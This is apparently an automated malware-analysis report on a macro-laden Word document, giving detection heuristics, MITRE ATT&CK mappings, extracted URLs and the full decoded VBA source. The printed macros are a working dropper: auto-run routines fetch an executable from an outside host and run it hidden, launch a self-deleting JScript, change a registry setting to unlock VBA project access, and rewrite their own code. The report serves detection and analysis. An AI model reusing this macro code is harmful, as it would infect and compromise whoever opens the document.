MALICIOUS
694
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1027 Obfuscated Files or Information
T1566.001 Spearphishing Attachment
The sample contains VBA macros that leverage WScript.Shell to download and save a file from an obfuscated URL, likely to execute a second-stage payload. The macros also exhibit self-replication behavior, attempting to write VBA project code, and reference cmd.exe and LOLBins. The AutoOpen macro attempts to delete document content and save the document, suggesting a lure to hide malicious activity.
Heuristics 17
-
ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
-
VBA project inside OOXML medium 13 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "cscript.exe //e:jscript """ & TMP & """", vbHide -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
X1 = "S=new ActiveXObject('WScript.Shell');" & _ -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Shell "cscript.exe //e:jscript """ & TMP & """", vbHide -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
X1 = "S=new ActiveXObject('WScript.Shell');" & _ -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
ADODBST.Write XMLHTTP.responseBody -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
ActiveDocument.VBProject.VBComponents("NewMacros").CodeModule.ReplaceLine 10, " ActiveDocument.Range(0, " & Q & ").Delete" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set XMLHTTP = CreateObject("Microsoft.XMLHTTP") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
"W=GetObject('',A);" & _ -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
If Dir$(TMP) <> "" Then Shell "cmd /c start """" """ & TMP & """", vbHide -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
TMP = Environ("TEMP") & "\~W0" & Int(Rnd * &HFFFF) & ".TMP" -
External hyperlinks (4) low OOXML_EXTERNAL_HYPERLINKSDocument contains 4 external hyperlinks — clickable URLs are stored as external relationships. First target: http://afterhoursgaming.tv/csgo-season-5/rules/
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://afterhoursgaming.tv/csgo-season-5/rules/ Referenced by macro
- http://day9.tv/d/b/ahgl-blog/Referenced by macro
- http://csgostream.com/ys.exeReferenced by macro
- http://@csgost�Referenced by macro
- http://csgostream.com/ys.exe�Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4276 bytes |
SHA-256: 2b50a97ed398e2028498b02ed9c105b182ee838c68448a6e0dadadb8ec0a6432 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Declare Sub OpenClipboard Lib "user32" (ByVal H As Long)
Private Declare Sub EmptyClipboard Lib "user32" ()
Private Declare Sub CloseClipboard Lib "user32" ()
Sub AutoOpen()
On Error GoTo Quit
If ActiveDocument.ReadOnly Then Exit Sub
ScreenUpdating = False
Selection.WholeStory
Selection.Font.Hidden = 0
ActiveDocument.Range(0, 15415).Delete
Selection.GoTo 1, 1
ActiveDocument.Save
Quit:
ScreenUpdating = True
Load
End Sub
Sub AutoClose()
On Error GoTo Quit
Load
NN = ""
DN = ActiveDocument.FullName
For I = 1 To Len(DN)
L = Mid(DN, I, 1)
If L = "\" Or L = "'" Then NN = NN + "\"
NN = NN + L
Next
X0 = "A='Word.Application';" & _
"N='" & NN & "';" & _
"for(B=1;B;){" & _
"try{" & _
"B=0;" & _
"W=GetObject('',A);" & _
"for(D=new Enumerator(W.Documents);!D.atEnd();D.moveNext())" & _
"if(N.toLowerCase()==D.item().FullName.toLowerCase())B=1;" & _
"}catch(E){}" & _
"WScript.sleep(1);" & _
"}" & _
"WScript.sleep(1500);"
X1 = "S=new ActiveXObject('WScript.Shell');" & _
"S.RegWrite('HKCU\\Software\\Microsoft\\Office\\" & Application.Version & "\\Word\\Security\\AccessVBOM',1,'REG_DWORD');"
X2 = "W=new ActiveXObject(A);" & _
"W.Visible=0;" & _
"W.WordBasic.DisableAutoMacros(1);" & _
"W.Documents.Open(N);" & _
"W.Application.Run('AutoTurn');"
X3 = "W.ActiveDocument.Save();" & _
"W.ActiveDocument.Close();" & _
"W.Quit();"
StartScript "try{" & X0 & X1 & X2 & X3 & "}catch(E){}"
Quit:
End Sub
Sub AutoTurn()
On Error GoTo Quit
If ActiveDocument.ReadOnly Then Exit Sub
Selection.EndKey 6
Q = Selection.Start
ActiveDocument.VBProject.VBComponents("NewMacros").CodeModule.ReplaceLine 10, " ActiveDocument.Range(0, " & Q & ").Delete"
If Q = 0 Then Exit Sub
Selection.GoTo 1, 1
ActiveDocument.Range(0, Q).Select
Selection.Copy
Selection.GoTo 1, 1
Selection.PasteAndFormat 16
OpenClipboard 0
EmptyClipboard
CloseClipboard
Selection.GoTo 1, 1
ActiveDocument.Range(0, Q).Select
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
Selection.Find.Execute "[0-9|a-z|A-Z|а-я|А-Я]", 0, 0, 1, 0, 0, 0, 0, 0, "?", 2
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
Selection.EndKey 6
O = Selection.Start
ActiveDocument.Range(Q, O).Font.Hidden = 1
Quit:
End Sub
Sub StartScript(SCRIPT As String)
On Error GoTo Quit
TMP = Environ("TEMP") & "\~W0" & Int(Rnd * &HFFFF) & ".TMP"
Open TMP For Output As #1
Print #1, "F=new ActiveXObject('Scripting.FileSystemObject');F.DeleteFile(WScript.ScriptFullName);" & SCRIPT
Close #1
Shell "cscript.exe //e:jscript """ & TMP & """", vbHide
Quit:
End Sub
Sub Load()
On Error GoTo Quit
TMP = Environ("TEMP") & "\~WTMP000.EXE"
If Dir$(TMP) <> "" Then Kill TMP
Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
XMLHTTP.Open "GET", Replace("http://csgostream.com/ys.exe", "\", "/"), "False"
XMLHTTP.Send
If XMLHTTP.StatusText = "OK" Then
Set ADODBST = CreateObject("ADODB.Stream")
ADODBST.Type = 1
ADODBST.Open
ADODBST.Write XMLHTTP.responseBody
ADODBST.SaveToFile TMP, 2
ADODBST.Close
Set ADODBST = Nothing
End If
Set XMLHTTP = Nothing
If Dir$(TMP) <> "" Then Shell "cmd /c start """" """ & TMP & """", vbHide
Quit:
End Sub
Sub FileTemplates()
End Sub
Sub ToolsCustomizeKeyboard()
End Sub
Sub ToolsMacro()
End Sub
Sub ToolsRecordMacroToggle()
End Sub
Sub ViewCode()
End Sub
Sub ViewSecurity()
End Sub
Sub ViewVBcode()
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 18944 bytes |
SHA-256: acbb8cdf1673c01157bb9527eb824d853d86e79f3ba74ea6d2896b8876d1c3d9 |
|||
|
Detection
ClamAV:
Doc.Dropper.Agent-6412232-1
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.